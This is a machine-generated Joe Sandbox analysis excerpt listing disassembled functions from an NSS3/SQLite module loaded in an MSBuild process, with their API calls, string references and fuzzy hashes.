                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1957633107-0
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604C97
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CB0
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CC9
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D11
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D2A
                                                                                        • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D4A
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D57
                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D97
                                                                                        • PR_Lock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604DBA
                                                                                        • PR_WaitCondVar.NSS3 ref: 6C604DD4
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604DE6
                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604DEF
                                                                                        Similarity
                                                                                        • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                        • String ID:
                                                                                        • API String ID: 3388019835-0
                                                                                        APIs
                                                                                        • sqlite3_step.NSS3(?), ref: 6C6066CA
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C60673D
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C6067B8
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C606A7A
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C606ADE
                                                                                        • sqlite3_errmsg.NSS3 ref: 6C606B80
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C606B93
                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C606BB6
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$memcpysqlite3_errmsgsqlite3_stepstrlen
                                                                                        • String ID: ($d
                                                                                        • API String ID: 2708504553-1915259565
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6A4E90
                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C6A4EA9
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6A4EC6
                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C6A4EDF
                                                                                        • PL_HashTableLookup.NSS3 ref: 6C6A4EF8
                                                                                        • PR_Unlock.NSS3 ref: 6C6A4F05
                                                                                        • PR_Now.NSS3 ref: 6C6A4F13
                                                                                        • PR_Unlock.NSS3 ref: 6C6A4F3A
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB
                                                                                        Similarity
                                                                                        • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                        • String ID: bUjl$bUjl
                                                                                        • API String ID: 326028414-3450169581
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_DigestInit), ref: 6C6B6C66
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B6C94
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B6CA3
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B6CB9
                                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C6B6CD5
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nyl
                                                                                        • API String ID: 1003633598-2245374282
                                                                                        APIs
                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C6CDE64), ref: 6C6CED0C
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6CED22
                                                                                          • Part of subcall function 6C6DB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7B18D0,?), ref: 6C6DB095
                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C6CED4A
                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C6CED6B
                                                                                        • PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C6CED38
                                                                                          • Part of subcall function 6C604C70: TlsGetValue.KERNEL32(?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604C97
                                                                                          • Part of subcall function 6C604C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CB0
                                                                                          • Part of subcall function 6C604C70: PR_Unlock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CC9
                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C6CED52
                                                                                        • PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C6CED83
                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C6CED95
                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C6CED9D
                                                                                          • Part of subcall function 6C6E64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C6E127C,00000000,00000000,00000000), ref: 6C6E650E
                                                                                        Similarity
                                                                                        • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                        • String ID: security
                                                                                        • API String ID: 3323615905-3315324353
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000400), ref: 6C6F4DCB
                                                                                          • Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
                                                                                          • Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
                                                                                          • Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C6F4DE1
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C6F4DFF
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6F4E59
                                                                                          • Part of subcall function 6C6DFAB0: free.MOZGLUE(?,-00000001,?,?,6C67F673,00000000,00000000), ref: 6C6DFAC7
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7B300C,00000000), ref: 6C6F4EB8
                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C6F4EFF
                                                                                        • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C6F4F56
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6F521A
                                                                                        Similarity
                                                                                        • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                        • String ID:
                                                                                        • API String ID: 1025791883-0
                                                                                        • Opcode ID: f440ba8f4fc78864505f031f631068b8ca36709c14f3ea30abc9f25994da40f7
                                                                                        • Instruction ID: cd6453475adced8f94616042edeca1c43828f887b22e98b34df748f9a23904a8
                                                                                        • Opcode Fuzzy Hash: f440ba8f4fc78864505f031f631068b8ca36709c14f3ea30abc9f25994da40f7
                                                                                        • Instruction Fuzzy Hash: A7F1AE71E05209CFDB04CF54D8407ADB7B2BF85318F258129D925ABB81EB75ED82CB98
                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C622F3D
                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C622FB9
                                                                                        • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C623005
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C6230EE
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C623131
                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C623178
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memsetsqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                        • API String ID: 984749767-598938438
                                                                                        • Opcode ID: d7833e6cec52b7bf87c62d0b8ea8045690e9effe386d86dc16d20b82ce45d9c9
                                                                                        • Instruction ID: 66258ccdc52739bd29cc801d7ef0123211ddd015b48327cbe15e45213a053f4a
                                                                                        • Opcode Fuzzy Hash: d7833e6cec52b7bf87c62d0b8ea8045690e9effe386d86dc16d20b82ce45d9c9
                                                                                        • Instruction Fuzzy Hash: E2B19071E052199BCB18CF9DC889AEEF7B5BF48304F144029E845B7B41D7789941CFA9
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: __allrem
                                                                                        • String ID: @yl$Pyl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$yl
                                                                                        • API String ID: 2933888876-3732613124
                                                                                        • Opcode ID: 8918ac5ca46dc110fd8446568dcea3d0517594c23ca81e214ed6fde92913e581
                                                                                        • Instruction ID: ddc0265b9eb2310d688b777a6885aeaac13a8f5906a2d98496ad10cf45ab69ff
                                                                                        • Opcode Fuzzy Hash: 8918ac5ca46dc110fd8446568dcea3d0517594c23ca81e214ed6fde92913e581
                                                                                        • Instruction Fuzzy Hash: 2461BF71B00205DFDB54CF68DC88AAA77B1FF49314F208A39E9159B780DB31AD06CBA5
                                                                                        APIs
                                                                                        • sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C6024EC
                                                                                        • sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C602315), ref: 6C60254F
                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C602315), ref: 6C60256C
                                                                                        Strings
                                                                                        • %s at line %d of [%.10s], xrefs: 6C602566
                                                                                        • API called with finalized prepared statement, xrefs: 6C602543, 6C60254D
                                                                                        • bind on a busy prepared statement: [%s], xrefs: 6C6024E6
                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6024F4, 6C602557
                                                                                        • misuse, xrefs: 6C602561
                                                                                        • API called with NULL prepared statement, xrefs: 6C60253C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
                                                                                        • API String ID: 632333372-2222229625
                                                                                        • Opcode ID: 37841d7be042d7f6efa236749f91238b5b467433d75e5e99642db69322429843
                                                                                        • Instruction ID: e415ff6fb4cbe6f5845c0f43a6a161f799d9062064432d065a946a0b28b2d694
                                                                                        • Opcode Fuzzy Hash: 37841d7be042d7f6efa236749f91238b5b467433d75e5e99642db69322429843
                                                                                        • Instruction Fuzzy Hash: 0D4125717006018BE7188F19DE98BA773B6AF8631DF14097CE8066FB40DB36E815C799
                                                                                        APIs
                                                                                        • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6DA4A6
                                                                                          • Part of subcall function 6C6E0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E08B4
                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C6DA4EC
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C6DA527
                                                                                        • memcmp.VCRUNTIME140(00000006,?,?), ref: 6C6DA56D
                                                                                        • memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C6DA583
                                                                                        • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C6DA596
                                                                                        • free.MOZGLUE(?), ref: 6C6DA5A4
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6DA5B6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
                                                                                        • String ID: ^jil
                                                                                        • API String ID: 3906949479-3219985638
                                                                                        • Opcode ID: 71d21cd2771874ab30f7478bf6a6a1fe5524277662f5bfc2a24f9ef7a6c2b2d5
                                                                                        • Instruction ID: 37f0cabc3af0d6b44ca1d2112559b23484c2ed1717c84ff91e41fc4a626fd998
                                                                                        • Opcode Fuzzy Hash: 71d21cd2771874ab30f7478bf6a6a1fe5524277662f5bfc2a24f9ef7a6c2b2d5
                                                                                        • Instruction Fuzzy Hash: 2D410635A093469FDB00CF59CC44B9ABBB2BF84308F19C468D8595BB42EB31F919C7A5
                                                                                        APIs
                                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,6C687D8F,6C687D8F,?,?), ref: 6C686DC8
                                                                                          • Part of subcall function 6C6DFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C6DFE08
                                                                                          • Part of subcall function 6C6DFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C6DFE1D
                                                                                          • Part of subcall function 6C6DFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C6DFE62
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C687D8F,?,?), ref: 6C686DD5
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7A8FA0,00000000,?,?,?,?,6C687D8F,?,?), ref: 6C686DF7
                                                                                          • Part of subcall function 6C6DB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7B18D0,?), ref: 6C6DB095
                                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C686E35
                                                                                          • Part of subcall function 6C6DFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C6DFE29
                                                                                          • Part of subcall function 6C6DFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C6DFE3D
                                                                                          • Part of subcall function 6C6DFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C6DFE6F
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C686E4C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E116E
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7A8FE0,00000000), ref: 6C686E82
                                                                                          • Part of subcall function 6C686AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C68B21D,00000000,00000000,6C68B219,?,6C686BFB,00000000,?,00000000,00000000,?,?,?,6C68B21D), ref: 6C686B01
                                                                                          • Part of subcall function 6C686AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C686B8A
                                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C686F1E
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C686F35
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7A8FE0,00000000), ref: 6C686F6B
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,6C687D8F,?,?), ref: 6C686FE1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                        • String ID:
                                                                                        • API String ID: 587344769-0
                                                                                        • Opcode ID: e77d0ef98c73a1a85aefd1435f22b43b5ff4480a33113817da5738ed85fd1fd3
                                                                                        • Instruction ID: 43de3eafffd6af768d4f82884978984307bf16cd3a6e1f212052eb5731831623
                                                                                        • Opcode Fuzzy Hash: e77d0ef98c73a1a85aefd1435f22b43b5ff4480a33113817da5738ed85fd1fd3
                                                                                        • Instruction Fuzzy Hash: 3271B471E212469FDB00CF55CD40BAABBA5FF95308F154229E818DBB11F770EA94CBA4
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE10
                                                                                        • EnterCriticalSection.KERNEL32(?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE24
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,6C6AD079,00000000,00000001), ref: 6C6CAE5A
                                                                                        • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE6F
                                                                                        • free.MOZGLUE(85145F8B,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE7F
                                                                                        • TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEB1
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEC9
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEF1
                                                                                        • free.MOZGLUE(6C6ACDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?), ref: 6C6CAF0B
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAF30
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                        • String ID:
                                                                                        • API String ID: 161582014-0
                                                                                        • Opcode ID: 8cc601312a1df8bc355db320d417b4a0ab49ff76f140f9b9115c73383b4afff9
                                                                                        • Instruction ID: 0ebdc46813fe7013629e82434c2ea7a4619c0931b1f194d9a2f487106b974de3
                                                                                        • Opcode Fuzzy Hash: 8cc601312a1df8bc355db320d417b4a0ab49ff76f140f9b9115c73383b4afff9
                                                                                        • Instruction Fuzzy Hash: 1D51B1B1A00601AFDB00DF29D889B55B7B4FF09318F144665E81897F12E731F865DBD6
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C6AAB7F,?,00000000,?), ref: 6C6A4CB4
                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6C6AAB7F,?,00000000,?), ref: 6C6A4CC8
                                                                                        • TlsGetValue.KERNEL32(?,6C6AAB7F,?,00000000,?), ref: 6C6A4CE0
                                                                                        • EnterCriticalSection.KERNEL32(?,?,6C6AAB7F,?,00000000,?), ref: 6C6A4CF4
                                                                                        • PL_HashTableLookup.NSS3(?,?,?,6C6AAB7F,?,00000000,?), ref: 6C6A4D03
                                                                                        • PR_Unlock.NSS3(?,00000000,?), ref: 6C6A4D10
                                                                                          • Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
                                                                                          • Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4
                                                                                        • PR_Now.NSS3(?,00000000,?), ref: 6C6A4D26
                                                                                          • Part of subcall function 6C749DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DC6
